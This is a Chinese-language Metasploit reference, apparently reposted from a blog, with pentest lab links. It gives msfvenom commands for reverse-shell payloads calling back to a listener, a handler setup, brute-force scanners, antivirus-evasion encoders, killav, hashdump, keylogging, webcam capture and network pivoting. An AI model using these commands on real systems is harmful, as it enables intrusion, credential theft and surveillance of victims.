ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

【工具手册】Metasploit漏洞利用框架

2022-04-26 17:01:01  阅读:257  来源: 互联网

标签:Metasploit use run scanner windows 手册 漏洞 模块 auxiliary


基本介绍 #

Metasploit模块划分 #

MSF是渗透测试领域最流行的渗透测试框架,它有以下几个模块:

辅 助 模 块 (Auxiliary,扫描器),扫描主机系统,寻找可用漏洞;

渗透攻击模块 (Exploits),选择并配置一个漏洞利用模块;

攻击载荷模块 (Payloads),选择并配置一个攻击载荷模块;

后渗透攻击模块 (Post),用于内网渗透的各种操作;

编 码 器 模 块 (Encoders),选择编码技术,绕过杀软(或其他免杀方式);

所有模块位置:/usr/share/metasploit-framework/modules/

渗透步骤(Exploit)

search xxx		#搜索某个漏洞
use xxx			#使用某个漏洞利用模块
show options	#查看配置选项
set payload		#配置攻击载荷
exploit			#执行渗透攻击

参数摘要 #

reload_all		#从目录重载所有模块
back	#后退命令,移出当前上下文,用于模块切换
info	#目标和模块详细信息
check	#检查目标是否受某个漏洞影响

sessions		#会话管理
sessions -l		#列出所有会话
sessions -K		#终止所有会话
sessions -i id	#进入某个会话
sessions -v		#以详细模式列出会话
sessions -u		#在许多平台上将shell升级到meterpreter会话

show options	#显示可选选项
	 auxiliary	#显示所有辅助模块
	 exploits	#显示所有漏洞利用模块
	 payloads	#显示所有有效载荷
	 targets	#显示所有可用目标
	 advanced	#显示更多高级选项
	 encoders	#显示可用编码器列表

使用辅助模块(Auxiliary) #

端口扫描 #

use auxiliary/scanner/portmap/portmap_amp
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/xmas

服务扫描 #

auxiliary/scanner/ssh/ssh_login		#SSH爆破
auxiliary/scanner/vnc/vnc_none_auth	#VNC空口令扫描
auxiliary/scanner/telnet/telnet_login#SSH爆破
auxiliary/scanner/smb/smb_version	#SMB系统版本扫描
auxiliary/scanner/smb/smb_enumusers	#SMB枚举
auxiliary/scanner/smb/smb_login		#SMB弱口令登录
auxiliary/admin/smb/psexec_command	#登录SMB且执行命令

auxiliary/scanner/mssql/mssql_ping	#MSSQL主机信息扫描
auxiliary/admin/mssql/mssql_enum	#MSSQL枚举
auxiliary/scanner/mysql/mysql_login	#MySQL弱口令扫描
auxiliary/admin/mysql/mysql_enum	#MySQL枚举

攻击载荷和编码(Payloads && Encoders) #

MSF可以用以下方式,生成payload和编码

use windows/meterpreter_reverse_http

-E   强制编码
-e   要使用的编码器模块的名称
-f   输出文件名(否则为stdout)
-t   输出格式: raw,ruby,rb,perl,pl,c,java,dll,exe,elf,vbs,asp,war等
-b   要避免的字符列表: '\x00\xff'

但是我个人更喜欢用msfvenom生成shellcode然后编码免杀。

Windows

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali监听端口 -f exe > msf.exe

参数选项:
-p			指定的payload
-e 			编码器,x86/shikata_ga_nai
-i			迭代器,对有效载荷的编码次数
-f			输出文件的格式,exe、dll、raw

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.15 LPORT=6666 -f elf > msf.elf

监听反弹shell #

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.1.1.15
msf5 exploit(multi/handler) > set LPORT 6666
msf5 exploit(multi/handler) > run

Meterpreter用例 #

刚获得Meterpreter Shell时,该Shell是极其脆弱的,可以把它和目标机中一个稳定的程序绑定

getpid			#查看当前Meterpreter Shell的进程号
ps				#获取目标机正运行的进程
migrate 476		#将shell迁移到PID为786的进程中

命令摘要 #

pwd、ls、cd
getuid		#查看当前权限
getsystem	#获得系统管理员权限(要本地管理员权限运行)
hashdump	#抓哈希密码
sysinfo		#查看系统信息
idletim     #查看目标系统已运行时间
route		#查看目标机完整网络设置
shell		#进入目标机shell,exit退出she
background	#将meterpreter隐藏在后台

upload ./1.txt c:\\1.txt		#上传文件
download c:\1.txt ./			#下载文件
search -f *.txt -d c://			#搜索文件

keyscan_start	#启动键盘记录
keyscan_stop	#停止键盘记录
keyscan_dump	#转储键盘记录的内容
screenshot		#抓取截屏
webcam_list		#摄像头列表
webcam_snap		#摄像头拍照
webcam_stream	#抓取视频

#Kali-Linux下登录远程桌面
sudo rdesktop -f 目标IP

route add IP 子网掩码    #添加路由,先background

后渗透模块(Post) #

run post/windows/gather/checkvm		#检查目标是否虚拟机
run post/linux/gather/checkvm
run post/windows/manage/killav		#关闭杀软
run post/windows/manage/enable_rdp	#开启目标远程桌面
run post/windows/gather/enum_logged_on_users	#列举当前登陆用户,和最近登陆过的用户
run post/windows/gather/enum_applications		#列举应用程序
run windows/gather/credentials/windows_autologin#列举自动登陆的用户名和密码

MSF官方后渗透模块参考:https://www.offensive-security.com/metasploit-unleashed/post-module-reference/

网络穿透 #

拿到反向shell之后,获取目标网络信息

meterpreter > run get_local_subnets

使用autoroute模块添加路由

meterpreter > run autoroute -s 10.0.0.0/255.0.0.0
meterpreter > run autoroute -p		#列出添加了路由规则的存活session

添加完成后返回上一层,这里一定要保证添加了路由规则的sessions的存活,如果sessions掉了对应的路由规则也就失效了

添加完成后使用ms17_010的扫描脚本进行目标内网的扫描

MSF靶机 #

Metasploitable2:

下载地址:https://sourceforge.net/projects/metasploitable/

官方教程:https://metasploit.help.rapid7.com/docs/metasploitable-2

Metasploitable3

下载地址:https://github.com/rapid7/metasploitable3/

视频教程演示:https://www.youtube.com/playlist?list=PLZOToVAK85MpnjpcVtNMwmCxMZRFaY6mT

标签:Metasploit,use,run,scanner,windows,手册,漏洞,模块,auxiliary
来源: https://www.cnblogs.com/letthink/p/16195486.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有